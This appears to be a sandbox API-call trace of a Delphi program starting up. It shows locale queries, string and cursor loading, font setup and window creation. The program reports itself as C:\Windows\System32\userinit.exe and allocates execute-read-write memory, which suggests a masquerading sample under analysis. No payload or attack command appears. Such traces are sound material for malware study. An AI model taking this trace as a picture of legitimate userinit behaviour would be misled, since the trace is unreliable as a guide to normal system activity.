[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x8fc70, cchData=256 | out: lpLCData="April") returned 6
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x8fc70, cchData=256 | out: lpLCData="May") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x8fc70, cchData=256 | out: lpLCData="May") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Jun") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x8fc70, cchData=256 | out: lpLCData="June") returned 5
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Jul") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x8fc70, cchData=256 | out: lpLCData="July") returned 5
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Aug") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x8fc70, cchData=256 | out: lpLCData="August") returned 7
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Sep") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x8fc70, cchData=256 | out: lpLCData="September") returned 10
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Oct") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x8fc70, cchData=256 | out: lpLCData="October") returned 8
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Nov") returned 4
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x8fc70, cchData=256 | out: lpLCData="November") returned 9
[0127.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Dec") returned 4
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x8fc70, cchData=256 | out: lpLCData="December") returned 9
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Sun") returned 4
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Sunday") returned 7
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Mon") returned 4
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Monday") returned 7
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Tue") returned 4
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Tuesday") returned 8
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Wed") returned 4
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Wednesday") returned 10
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Thu") returned 4
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Thursday") returned 9
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Fri") returned 4
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Friday") returned 7
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Sat") returned 4
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x8fc70, cchData=256 | out: lpLCData="Saturday") returned 9
[0127.739] GetThreadLocale () returned 0x409
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x8fccc, cchData=256 | out: lpLCData="$") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x8fccc, cchData=256 | out: lpLCData="0") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x8fccc, cchData=256 | out: lpLCData="0") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x8fdc4, cchData=2 | out: lpLCData=",") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x8fdc4, cchData=2 | out: lpLCData=".") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x8fccc, cchData=256 | out: lpLCData="2") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x8fdc4, cchData=2 | out: lpLCData="/") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x8fccc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0127.739] GetThreadLocale () returned 0x409
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x8fc98, cchData=256 | out: lpLCData="1") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x8fccc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0127.739] GetThreadLocale () returned 0x409
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x8fc98, cchData=256 | out: lpLCData="1") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x8fdc4, cchData=2 | out: lpLCData=":") returned 2
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x8fccc, cchData=256 | out: lpLCData="AM") returned 3
[0127.739] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x8fccc, cchData=256 | out: lpLCData="PM") returned 3
[0127.740] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x8fccc, cchData=256 | out: lpLCData="0") returned 2
[0127.740] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x8fccc, cchData=256 | out: lpLCData="0") returned 2
[0127.740] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x8fccc, cchData=256 | out: lpLCData="0") returned 2
[0127.740] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x8fdc4, cchData=2 | out: lpLCData=",") returned 2
[0127.740] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0127.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0127.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0127.741] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0127.741] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0127.741] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0127.742] GetDC (hWnd=0x0) returned 0x1a01071a
[0127.742] GetDeviceCaps (hdc=0x1a01071a, index=90) returned 96
[0127.742] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0127.742] GetDC (hWnd=0x0) returned 0x1a01071a
[0127.742] GetDeviceCaps (hdc=0x1a01071a, index=104) returned 0
[0127.742] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0127.742] CreatePalette (plpal=0x8fa28) returned 0xd08089f
[0127.742] GetStockObject (i=7) returned 0x1b00017
[0127.742] GetStockObject (i=5) returned 0x1900015
[0127.742] GetStockObject (i=13) returned 0x18a002e
[0127.742] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0127.742] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0127.743] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0127.743] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0127.744] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0127.745] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x8fa24, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0127.745] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0127.745] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0127.745] GetVersion () returned 0x1db10106
[0127.745] GetCurrentProcessId () returned 0x824
[0127.745] GlobalAddAtomA (lpString="Delphi00000824") returned 0xc12f
[0127.746] GetCurrentThreadId () returned 0x764
[0127.746] GlobalAddAtomA (lpString="ControlOfs0040000000000764") returned 0xc12e
[0127.746] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000764") returned 0xc170
[0127.746] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0127.746] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0127.746] GetSystemMetrics (nIndex=19) returned 1
[0127.793] GetSystemMetrics (nIndex=75) returned 1
[0127.793] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x581310, fWinIni=0x0 | out: pvParam=0x581310) returned 1
[0127.793] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0127.793] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0127.793] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x501af
[0127.794] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0127.794] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0127.794] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0127.794] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x130067
[0127.794] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x60219
[0127.794] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x601f3
[0127.794] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x601f5
[0127.794] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x601e7
[0127.794] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x601c3
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0127.795] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0127.795] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0127.795] GetDC (hWnd=0x0) returned 0x1a01071a
[0127.795] GetDeviceCaps (hdc=0x1a01071a, index=90) returned 96
[0127.795] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0127.795] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0127.795] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x58155c) returned 1
[0127.795] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x8fd8f, fWinIni=0x0 | out: pvParam=0x8fd8f) returned 1
[0127.795] CreateFontIndirectA (lplf=0x8fd8f) returned 0x5c0a0875
[0127.795] GetObjectA (in: h=0x5c0a0875, c=60, pv=0x8fb80 | out: pv=0x8fb80) returned 60
[0127.796] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x8fc3b, fWinIni=0x0 | out: pvParam=0x8fc3b) returned 1
[0127.796] CreateFontIndirectA (lplf=0x8fd17) returned 0x330a0898
[0127.796] GetObjectA (in: h=0x330a0898, c=60, pv=0x8fb80 | out: pv=0x8fb80) returned 60
[0127.796] CreateFontIndirectA (lplf=0x8fcdb) returned 0x2c0a088c
[0127.796] GetObjectA (in: h=0x2c0a088c, c=60, pv=0x8fb80 | out: pv=0x8fb80) returned 60
[0127.796] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0127.796] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x8fcef, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0127.796] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x8fcef | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0127.796] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xa0000
[0127.796] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x8fca4 | out: lpWndClass=0x8fca4) returned 0
[0127.796] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0127.796] GetSystemMetrics (nIndex=0) returned 1440
[0127.796] GetSystemMetrics (nIndex=1) returned 900
[0127.796] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x601e4
[0127.800] SetWindowLongA (hWnd=0x601e4, nIndex=-4, dwNewLong=659439) returned 4219500
[0127.800] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0127.800] SendMessageA (hWnd=0x601e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0127.800] DefWindowProcA (hWnd=0x601e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0127.811] DefWindowProcA (hWnd=0x601e4, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x5020d
[0127.812] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0127.812] SetClassLongA (hWnd=0x601e4, nIndex=-14, dwNewLong=65575) returned 0x0
[0127.812] GetSystemMenu (hWnd=0x601e4, bRevert=0) returned 0x601bb
[0127.814] DeleteMenu (hMenu=0x601bb, uPosition=0xf030, uFlags=0x0) returned 1
[0127.814] DeleteMenu (hMenu=0x601bb, uPosition=0xf000, uFlags=0x0) returned 1
[0127.814] DeleteMenu (hMenu=0x601bb, uPosition=0xf010, uFlags=0x0) returned 1
[0127.815] GetKeyboardLayoutList (in: nBuff=64, lpList=0x8fc70 | out: lpList=0x8fc70) returned 1
[0127.816] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0127.816] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0127.816] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6cc60000
[0127.816] GetProcAddress (hModule=0x6cc60000, lpProcName="InitializeFlatSB") returned 0x6cc9266f
[0127.816] GetProcAddress (hModule=0x6cc60000, lpProcName="UninitializeFlatSB") returned 0x6cc92542
[0127.816] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollProp") returned 0x6cc91d29
[0127.816] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollProp") returned 0x6cc9238d
[0127.816] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cc920c9
[0127.817] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cc91fdb
[0127.817] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollRange") returned 0x6cc91e8d
[0127.817] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cc91f0f
[0127.817] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollPos") returned 0x6cc91ccd
[0127.817] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollPos") returned 0x6cc9216d
[0127.817] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cc922be
[0127.817] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollRange") returned 0x6cc921e2
[0127.817] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0127.817] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0127.817] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0127.817] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
